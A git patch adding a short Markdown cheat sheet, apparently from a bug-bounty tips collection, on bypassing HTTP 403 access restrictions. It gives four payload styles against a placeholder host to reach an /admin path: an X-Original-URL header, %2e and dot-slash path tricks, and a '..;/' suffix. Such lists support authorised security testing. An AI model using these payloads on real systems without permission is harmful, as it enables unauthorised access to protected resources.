From 4c32ea9202b0a47e4288be85dec2fb89f108fc00 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+MD15@users.noreply.github.com>
Date: Wed, 9 Sep 2020 21:53:05 +0700
Subject: [PATCH] Bypass 403 [1]

Create how to bypass 403 Code and add 4 tips
---
 Bypass403.md | 42 ++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 Bypass403.md

diff --git a/Bypass403.md b/Bypass403.md
new file mode 100644
index 0000000..540a419
--- /dev/null
+++ b/Bypass403.md
@@ -0,0 +1,42 @@
+# 403 Forbidden Bypass
+
+1. Using "X-Original-URL" header
+```
+GET /admin HTTP/1.1
+Host: target.com
+```
+Try this to bypass
+```
+GET /anything HTTP/1.1
+Host: target.com
+X-Original-URL: /admin
+```
+
+2. Appending **%2e** after the first slash
+```
+http://target.com/admin => 403
+```
+Try this to bypass
+```
+http://target.com/%2e/admin => 200
+```
+
+3. Try add dot (.) and slash (/) in the URL
+```
+http://target.com/admin => 403
+```
+Try this to bypass
+```
+http://target.com/admin/. => 200
+http://target.com//admin// => 200
+http://target.com/./admin/./ => 200
+```
+
+4. Add "..;/" after the directory name
+```
+http://target.com/admin
+```
+Try this to bypass
+```
+http://target.com/admin..;/
+```